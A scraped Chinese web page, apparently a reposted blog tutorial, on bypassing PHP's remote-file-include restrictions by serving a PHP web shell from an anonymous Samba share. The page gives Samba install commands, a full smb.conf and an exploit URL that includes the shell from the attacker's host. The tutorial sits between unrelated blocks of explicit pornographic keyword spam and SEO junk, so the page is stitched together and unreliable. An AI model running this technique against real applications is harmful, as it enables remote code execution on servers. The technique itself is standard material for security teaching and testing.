好湿?好紧?好多水好爽自慰,久久久噜久噜久久综合,成人做爰A片免费看黄冈,机机对机机30分钟无遮挡

主頁 > 知識庫 > 使用SMB共享來繞過php遠程文件包含的限制執(zhí)行RFI的利用

使用SMB共享來繞過php遠程文件包含的限制執(zhí)行RFI的利用

熱門標簽:咸寧銷售電銷機器人系統(tǒng) 余姚電話機器人 電銷機器人問門薩維品牌my 400電話蘭州申請請 外呼系統(tǒng)能給企業(yè)帶來哪些好處 百度地圖怎樣標注圖標 百度地圖標注偏差 廣東廣州在怎么申請400電話 開發(fā)地圖標注類網(wǎng)站

在這篇博文中,我將為大家演示如何利用PHP應用中的遠程文件包含漏洞的技術。我們將繞過php遠程文件包含的限制,并執(zhí)行RFI的利用,即使PHP環(huán)境被配置為不包含來自遠程HTTP/FTP URL的文件。

PHP 和 SMB 共享文件訪問

在PHP配置文件中,“allow_url_include”wrapper默認設置為“Off”,指示PHP不加載遠程HTTP或FTP URL,從而防止遠程文件包含攻擊。但是,即使“allow_url_include”和“allow_url_fopen”都設置為“Off”,PHP也不會阻止加載SMB URL。而這就極有可能被濫用來從SMB共享加載遠程托管的PHP Web shell。

攻擊場景概述

當易受攻擊的PHP應用程序代碼嘗試從受攻擊者控制的SMB共享加載PHP Web shell時,SMB共享應允許訪問該文件。攻擊者需要在其上配置具有匿名瀏覽訪問權(quán)限的SMB服務器。因此,一旦易受攻擊的應用程序嘗試從SMB共享訪問PHP Web shell,SMB服務器將不會要求任何的憑據(jù),易受攻擊的應用程序?qū)琖eb shell的PHP代碼。

首先,我重新配置了PHP環(huán)境,并在php.in i文件中禁用了“allow-url-fopen”和“allow-url-include”。之后,配置了具有匿名瀏覽訪問的SMB服務器。一旦SMB共享準備就緒,我們就可以利用易受攻擊的應用程序了。

PHP 環(huán)境設置

將托管易受攻擊代碼的機器上的“allow_url_fopen”和“allow_url_include”設置為“Off”

以下是版本為“5.5.11”的PHP當前配置截圖:

 

在繼續(xù)下一步之前,讓我們確保當我們嘗試訪問HTTP上托管的Web shell時,PHP代碼不允許遠程文件包含。

 

可以看到,當我試圖從遠程主機包含PHP Web shell時,應用程序拋出錯誤并且沒有包含遠程文件。

使用匿名瀏覽訪問配置 Samba 服務器(Linux 機器)
使用以下命令安裝Samba服務器:

apt-get install samba創(chuàng)建SMB共享目錄:

mkdir /var/www/html/pub/

 

配置新創(chuàng)建的SMB共享目錄的權(quán)限:

chmod 0555 /var/www/html/pub/
chown -R nobody:nogroup /var/www/html/pub/

 

運行以下命令,刪除SAMBA服務器配置文件的默認內(nèi)容。

echo > /etc/samba/smb.conf將以下內(nèi)容添加到/etc/samba/smb.conf文件。

[global]
workgroup = WORKGROUP
server string = Samba Server %v
netbios name = indishell-lab
security = user
map to guest = bad user
name resolve order = bcast host
dns proxy = no
bind interfaces only = yes
[ica]
path = /var/www/html/pub
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555

force user = nobody現(xiàn)在,重啟SAMBA服務器以使配置文件/etc/samba/smb.conf中的新配置生效。

service smbd restart成功重啟SAMBA服務器后,嘗試訪問SMB共享并確保SAMBA服務器不要求提供憑據(jù)。

在本例中,SAMBA服務器IP為192.168.0.3,我需要訪問Windows文件瀏覽器中的SMB共享,如下:

\\192.168.0.3\&;

 

在 SMB 共享中托管 PHP Web shell

太棒了!可以訪問smb共享,并顯示目錄“ica”存在。

 

現(xiàn)在,將PHP shell托管在目錄“/var/www/html/pub”中,該目錄為smb共享目錄“ica”。

成功托管PHP shell后,我們使用Windows文件瀏覽器訪問SMB共享目錄“ica”。

\\192.168.0.3\ica\可以看到php shell存在于smb共享目錄中,在本例中為box.php文件。

 

利用文件包含易受攻擊的參數(shù)
讓我們使用這個PHP shell SMB鏈接,以及易受攻擊的php代碼瀏覽它。

http://vulnerable_application/page.php?page=\\192.168.0.3\ica\box.phpPHP易受攻擊的代碼從SMB共享中獲取了web shell,并在應用程序服務器上執(zhí)行了代碼\m/。我們已經(jīng)繞過了php遠程文件包含的限制,并包含了托管在遠程主機上的Web shell。

 

總結(jié)

以上所述是小編給大家介紹的使用SMB共享來繞過php遠程文件包含的限制執(zhí)行RFI的利用,希望對大家有所幫助,如果大家有任何疑問請給我留言,小編會及時回復大家的。在此也非常感謝大家對腳本之家網(wǎng)站的支持!

您可能感興趣的文章:
  • php文件包含目錄配置open_basedir的使用與性能詳解
  • PHP中你應該知道的require()文件包含的正確用法
  • php 偽造本地文件包含漏洞的代碼
  • PHP 網(wǎng)絡開發(fā)詳解之遠程文件包含漏洞
  • php文件包含的幾種方式總結(jié)

標簽:衡陽 銅陵 十堰 巴彥淖爾 臨沂 重慶 鷹潭 麗江

巨人網(wǎng)絡通訊聲明:本文標題《使用SMB共享來繞過php遠程文件包含的限制執(zhí)行RFI的利用》,本文關鍵詞  使用,SMB,共享,來,繞過,php,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問題,煩請?zhí)峁┫嚓P信息告之我們,我們將及時溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡,涉及言論、版權(quán)與本站無關。
  • 相關文章
  • 下面列出與本文章《使用SMB共享來繞過php遠程文件包含的限制執(zhí)行RFI的利用》相關的同類信息!
  • 本頁收集關于使用SMB共享來繞過php遠程文件包含的限制執(zhí)行RFI的利用的相關信息資訊供網(wǎng)民參考!
  • 推薦文章
    主站蜘蛛池模板: 天天摸天天碰天天添无码亚洲| 久久久91人妻精品一区二区三区| 欧美videos另类精品| 成人黄色一级片| 夜夜操天天| 一边下奶一吃敷视频53分钟| 少妇9999九九九九在线观看| 国产精品99r8在线观看| 把腿先翘起来不用紧张| 刘亦菲张开腿让我爽了一夜| 女人18毛片A片久久18软件| 宝贝乖腿弄大一点就不疼了| 51久久| 午夜福利一区二区三区免费| 婚前试爱新婚夜高潮视频| 啊灬啊灬啊灬快灬毛片视频| 男明星露勃起j照| 嗯~啊~用力~高H~纯肉~男男 两根太满了嗯啊夹到喷了漫画免费 | 艳肉乱痕1一12章精汁欲液| 男人在线观看| 久久久久久黃色網站免費| 欧美激情一区| 亚洲 欧美 日韩 偷 妻 乱| 冻千秋乳喷黄文| 小丹你已经让我进去了一次了| 就要干就要射| chinese男模gay呻吟| 三级国产香港| 成年视频免费观看| 餐桌下狂c亲女高辣h文| 免费?无码?国产免费软件| 一本色道久久HEZYO无码| 潘甜甜的七夕1080p| 粗大贯穿白浊跪趴bl| 污点app| 蜜桃精品一区二区三区在线观看| 人獸交片av网站| www.最色| 久热精品视频在线| 女乱婬免费看视频大黄| 亚洲综合色视频|